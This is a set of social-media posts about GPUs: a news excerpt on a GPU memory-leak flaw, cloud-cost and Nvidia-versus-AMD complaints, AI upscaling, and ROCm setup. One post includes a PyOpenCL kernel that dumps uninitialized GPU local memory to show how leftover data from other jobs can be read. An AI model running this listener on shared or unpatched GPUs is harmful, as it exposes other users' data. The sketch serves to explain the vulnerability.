My interpretation: "If only the big AI companies are buying our #GPUs, then that is a limited market. Let's increase our market to national governments"
#AI #Cybersecurity #LLMs #GPUs: "As more companies ramp up development of artificial intelligence systems, they are increasingly turning to graphics processing unit (GPU) chips for the computing power they need to run large language models (LLMs) and to crunch data quickly at massive scale. Between video game processing and AI, demand for GPUs has never been higher, and chipmakers are rushing to bolster supply. In new findings released today, though, researchers are highlighting a vulnerability in multiple brands and models of mainstream GPUs—including Apple, Qualcomm, and AMD chips—that could allow an attacker to steal large quantities of data from a GPU’s memory.
The silicon industry has spent years refining the security of central processing units, or CPUs, so they don’t leak data in memory even when they are built to optimize for speed. However, since GPUs were designed for raw graphics processing power, they haven’t been architected to the same degree with data privacy as a priority. As generative AI and other machine learning applications expand the uses of these chips, though, researchers from New York–based security firm Trail of Bits say that vulnerabilities in GPUs are an increasingly urgent concern."
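For anyone wondering what "stealing data from a GPU's memory" looks like in practice, here is a minimal, hypothetical sketch of the general idea in PyOpenCL (this is not Trail of Bits' actual proof of concept; kernel and buffer names are mine). A "listener" kernel declares local memory, never initializes it, and copies out whatever it finds; on a vulnerable GPU, that scratch space can still hold data left behind by a previous kernel:

```python
import numpy as np
import pyopencl as cl

# Hypothetical "listener" kernel: declares local (on-chip scratch) memory,
# never writes to it, and dumps whatever it already contains. On a
# vulnerable GPU that leftover content can belong to another process.
KERNEL_SRC = """
__kernel void dump_local(__global uint *out, __local uint *scratch) {
    // Read uninitialized local memory and copy it out to global memory.
    out[get_global_id(0)] = scratch[get_local_id(0)];
}
"""

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
prog = cl.Program(ctx, KERNEL_SRC).build()

n, group = 1024, 256
out = np.zeros(n, dtype=np.uint32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)
scratch = cl.LocalMemory(4 * group)  # 256 uninitialized uints per work-group

prog.dump_local(queue, (n,), (group,), out_buf, scratch)
cl.enqueue_copy(queue, out, out_buf)

# On patched or unaffected hardware this should be all zeros (or noise that
# never crosses a process boundary); recognizable nonzero data here would be
# leftovers from an earlier compute job, e.g. LLM activations.
print(out[:16])
```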
🔥 Most companies using #AI are ‘lighting money on fire,’ says Cloudflare CEO
“If you look at big cloud providers, one of the decisions they made early on was to make it more expensive for you to move your data from one region to another or from one cloud provider to another. AWS, for example, marks up their transport costs 4,000 times what their underlying costs are. And what that is doing in the AI space is actually further artificially constraining access to #GPUs”
As of November 22nd 2023, my experience with #Wayland #KDEPlasma on an #Nvidia GPU is still atrocious, while on #AMD it is almost flawless ... Seriously thinking of swapping the RTX 3060 in my secondary PC for an RX 6600, despite expecting slightly worse game performance ... Screw Nvidia ...
@weipah Cool, that's an interesting setup ... This rig is more like a spare-parts splice - I had an older Intel-based PC and a lot of #GPUs lying around, left over from the 2021 #crypto craze; it's not my first choice and only occasionally used in my 2nd home. I love ray tracing, but I would still rather go with AMD, I dislike #Nvidia that much 😎. I still game at Full HD only, and for the games that support it so far, my RX 6700 XT's performance with #raytracing is sufficient.
Does anyone know anything about computers? I've heard pros and cons about pre-built computers. I also don't know much about what parts are worth buying, especially GPUs.
It's funny how we made screens so high-resolution that it became hard for #GPUs to render games natively, so the best solution is to keep rendering games at low resolution and just let #AI guess what the in-between pixels should be, because it turns out our eyes aren't really that good.
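For the curious, the "guess the in-between pixels" step is, at its dumbest, plain interpolation. Below is a minimal NumPy bilinear-upscale sketch (function name and frame sizes are mine); DLSS/FSR-style upscalers replace this with motion-aware, ML-based reconstruction, but the render-low, display-high idea is the same:

```python
import numpy as np

def bilinear_upscale(img: np.ndarray, factor: int) -> np.ndarray:
    """Upscale a 2D image by `factor`, guessing each in-between pixel by
    blending its four nearest low-res neighbors."""
    h, w = img.shape
    ys = np.linspace(0, h - 1, h * factor)   # fractional source rows
    xs = np.linspace(0, w - 1, w * factor)   # fractional source cols
    y0 = np.floor(ys).astype(int); y1 = np.minimum(y0 + 1, h - 1)
    x0 = np.floor(xs).astype(int); x1 = np.minimum(x0 + 1, w - 1)
    wy = (ys - y0)[:, None]                  # vertical blend weights
    wx = (xs - x0)[None, :]                  # horizontal blend weights
    top = img[y0][:, x0] * (1 - wx) + img[y0][:, x1] * wx
    bot = img[y1][:, x0] * (1 - wx) + img[y1][:, x1] * wx
    return top * (1 - wy) + bot * wy

# Render at 1080p, display at 4K: the GPU only shades a quarter of the pixels.
frame = np.random.rand(1080, 1920)
print(bilinear_upscale(frame, 2).shape)  # (2160, 3840)
```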
🔥 #AMDlabnotes presents another new article - this time helping data scientists and ML practitioners get their #PyTorch or #TensorFlow environment up and running on #AMD #GPUs 🔥
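Once ROCm and a ROCm build of PyTorch are installed, AMD GPUs show up through the familiar torch.cuda API (HIP is mapped onto it), so a quick sanity check looks something like this minimal sketch (device names and tensor sizes will vary):

```python
import torch

# On ROCm builds, torch.version.hip is a version string (it is None on
# CUDA builds), and "cuda" devices transparently target the AMD GPU.
print(torch.version.hip)                # ROCm/HIP version on a ROCm build
print(torch.cuda.is_available())        # True if a supported AMD GPU is found
print(torch.cuda.get_device_name(0))    # e.g. a Radeon/Instinct device name

x = torch.randn(4096, 4096, device="cuda")  # allocated on the AMD GPU
y = x @ x                                    # matmul runs on the GPU
print(y.device)
```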